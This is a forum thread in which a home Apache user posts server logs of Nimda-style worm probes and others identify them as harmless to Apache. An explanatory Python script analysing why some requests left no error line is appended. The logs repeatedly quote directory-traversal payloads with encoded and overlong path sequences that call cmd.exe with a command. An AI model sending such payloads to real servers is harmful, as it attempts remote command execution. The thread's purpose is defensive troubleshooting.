LinuxQuestions.org
Old 07-31-2004, 03:06 AM   #1
apc
LQ Newbie
 
Registered: Jul 2004
Posts: 11

Rep: Reputation: 0
Random exe requests to apache


I'm running apache just so I can have a simple little website hosted from my computer for my family and friends. Tonight I came home to the following in my logs:

In access_log:
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:51 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 467
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:51 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 467
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:51 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:51 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:51 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:51 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:51 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:51 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:52 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:52 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:52 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:52 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:52 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:52 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:52 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
c-66-229-158-211.we.client2.attbi.com - - [30/Jul/2004:22:45:52 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:36:44 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:36:46 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:36:48 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:36:52 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:36:54 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:36:56 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:36:58 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:37:00 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:37:02 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:37:04 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:37:06 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:37:08 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:37:10 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:37:12 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:37:13 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467
66-65-69-175.nyc.rr.com - - [30/Jul/2004:23:37:15 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 467

and in error_log:

[Fri Jul 30 22:45:51 2004] [error] [client 66.229.158.211] File does not exist: /var/www/htdocs/scripts/root.exe
[Fri Jul 30 22:45:51 2004] [error] [client 66.229.158.211] File does not exist: /var/www/htdocs/MSADC/root.exe
[Fri Jul 30 22:45:51 2004] [error] [client 66.229.158.211] File does not exist: /var/www/htdocs/c/winnt/system32/cmd.exe
[Fri Jul 30 22:45:51 2004] [error] [client 66.229.158.211] File does not exist: /var/www/htdocs/d/winnt/system32/cmd.exe
[Fri Jul 30 22:45:51 2004] [error] [client 66.229.158.211] File does not exist: /var/www/htdocs/scripts/..%5c../winnt/system32/cmd.exe
[Fri Jul 30 22:45:51 2004] [error] [client 66.229.158.211] File does not exist: /var/www/htdocs/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Fri Jul 30 22:45:51 2004] [error] [client 66.229.158.211] File does not exist: /var/www/htdocs/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Fri Jul 30 22:45:51 2004] [error] [client 66.229.158.211] File does not exist: /var/www/htdocs/msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe
[Fri Jul 30 22:45:52 2004] [error] [client 66.229.158.211] File does not exist: /var/www/htdocs/scripts/..\xc1\x1c../winnt/system32/cmd.exe
[Fri Jul 30 22:45:52 2004] [error] [client 66.229.158.211] File does not exist: /var/www/htdocs/scripts/..\xc0\xaf../winnt/system32/cmd.exe
[Fri Jul 30 22:45:52 2004] [error] [client 66.229.158.211] File does not exist: /var/www/htdocs/scripts/..\xc1\x9c../winnt/system32/cmd.exe
[Fri Jul 30 22:45:52 2004] [error] [client 66.229.158.211] File does not exist: /var/www/htdocs/scripts/..%5c../winnt/system32/cmd.exe
[Fri Jul 30 22:45:52 2004] [error] [client 66.229.158.211] File does not exist: /var/www/htdocs/scripts/..%2f../winnt/system32/cmd.exe
[Fri Jul 30 23:36:44 2004] [error] [client 66.65.69.175] File does not exist: /var/www/htdocs/scripts/root.exe
[Fri Jul 30 23:36:46 2004] [error] [client 66.65.69.175] File does not exist: /var/www/htdocs/MSADC/root.exe
[Fri Jul 30 23:36:48 2004] [error] [client 66.65.69.175] File does not exist: /var/www/htdocs/c/winnt/system32/cmd.exe
[Fri Jul 30 23:36:52 2004] [error] [client 66.65.69.175] File does not exist: /var/www/htdocs/d/winnt/system32/cmd.exe
[Fri Jul 30 23:36:54 2004] [error] [client 66.65.69.175] File does not exist: /var/www/htdocs/scripts/..%5c../winnt/system32/cmd.exe
[Fri Jul 30 23:36:56 2004] [error] [client 66.65.69.175] File does not exist: /var/www/htdocs/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Fri Jul 30 23:36:58 2004] [error] [client 66.65.69.175] File does not exist: /var/www/htdocs/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Fri Jul 30 23:37:00 2004] [error] [client 66.65.69.175] File does not exist: /var/www/htdocs/msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe
[Fri Jul 30 23:37:02 2004] [error] [client 66.65.69.175] File does not exist: /var/www/htdocs/scripts/..\xc1\x1c../winnt/system32/cmd.exe
[Fri Jul 30 23:37:06 2004] [error] [client 66.65.69.175] File does not exist: /var/www/htdocs/scripts/..\xc0\xaf../winnt/system32/cmd.exe
[Fri Jul 30 23:37:08 2004] [error] [client 66.65.69.175] File does not exist: /var/www/htdocs/scripts/..\xc1\x9c../winnt/system32/cmd.exe
[Fri Jul 30 23:37:13 2004] [error] [client 66.65.69.175] File does not exist: /var/www/htdocs/scripts/..%5c../winnt/system32/cmd.exe
[Fri Jul 30 23:37:15 2004] [error] [client 66.65.69.175] File does not exist: /var/www/htdocs/scripts/..%2f../winnt/system32/cmd.exe

It would appear to be some Windows virus maybe, so hopefully it's nothing to worry about, but I wanted to get some insight from people more knowledgeable than myself. Also, one thing that concerned me is that there were 16 requests made by each IP but only 13 error messages generated by me.
 
Old 07-31-2004, 03:08 AM   #2
SBing
Member
 
Registered: Mar 2004
Posts: 519

Rep: Reputation: 35
You could try searching at Google for more info on the subject. These logs are generated by Win32 viruses scanning for other vulnerable machines - nothing to worry about.

Just put: root.exe apache

into Google and see what you come up with.
 
Old 07-31-2004, 03:19 AM   #3
prissed
LQ Newbie
 
Registered: Jul 2004
Location: McKinney, TX
Distribution: MDK 10/KDE 3.2
Posts: 21

Rep: Reputation: 15
Looks like the Nimda worm. It's designed to exploit IIS, but since you're running Apache, you should be okay... well, except for bandwidth, depending on how often you're getting hit.

http://www.f-secure.com/v-descs/nimda.shtml
 
Old 07-31-2004, 08:21 AM   #4
Lleb_KCir
Senior Member
 
Registered: Nov 2003
Location: Orlando FL
Distribution: Debian
Posts: 1,765

Rep: Reputation: 45
http://bleaklow.com/blog/archive/000009.html

From the first google.com search on the suggestion here. Great idea, I'm going to muddle with this over the weekend to see what I can do to drop those annoying M$ viruses from hitting my servers.
 
Old 07-31-2004, 12:39 PM   #5
Crashed_Again
Senior Member
 
Registered: Dec 2002
Location: Atlantic City, NJ
Distribution: Ubuntu & Arch
Posts: 3,503

Rep: Reputation: 57
It's a lost cause to try and drop these things. My snort log is filled with them and if you ban one IP who is infected three more pop up later. The only comfort we have is knowing that this virus just doesn't work on Linux servers.
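
Added example, not part of any post in this thread: a sketch of why the first post sees 16 requests per client in access_log but only 13 "File does not exist" lines in error_log. It assumes a simplified model of Apache's single URL-decoding pass (malformed %-escape gives 400, a decoded slash gives 404, and neither reaches the file lookup); the names classify and summarize are made up for this example.

```python
from collections import Counter

# Request targets of one client's 16 probes, copied from the access_log above.
PROBES = """\
/scripts/root.exe?/c+dir
/MSADC/root.exe?/c+dir
/c/winnt/system32/cmd.exe?/c+dir
/d/winnt/system32/cmd.exe?/c+dir
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
""".split()

HEX = set("0123456789abcdefABCDEF")

def classify(target):
    """Predict the outcome for a request target that maps to no real file.

    Assumption of this example: one decoding pass over the path only; a
    malformed escape or a decoded '/' (or NUL) is rejected before the
    filesystem lookup that writes "File does not exist" to error_log.
    """
    path = target.split("?", 1)[0]           # the query string is not unescaped
    bad_escape = bad_path = False
    i = 0
    while i < len(path):
        pair = path[i + 1:i + 3]
        if path[i] == "%" and len(pair) == 2 and set(pair) <= HEX:
            bad_path |= int(pair, 16) in (0x00, 0x2F)   # decoded NUL or '/'
            i += 3
        else:
            bad_escape |= path[i] == "%"     # '%' not followed by two hex digits
            i += 1
    if bad_escape:
        return "400 bad escape, no file lookup"
    if bad_path:
        return "404 encoded slash, no file lookup"
    return "404 File does not exist"

def summarize(targets):
    """Count predicted outcomes across a list of request targets."""
    return Counter(classify(t) for t in targets)
```

The two `%%35...` probes are the 400 responses in access_log, and the `%c0%2f` probe is the one 404 with no matching error_log line; `%252f` decodes only to the literal text `%2f`, so it still reaches the file lookup.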
 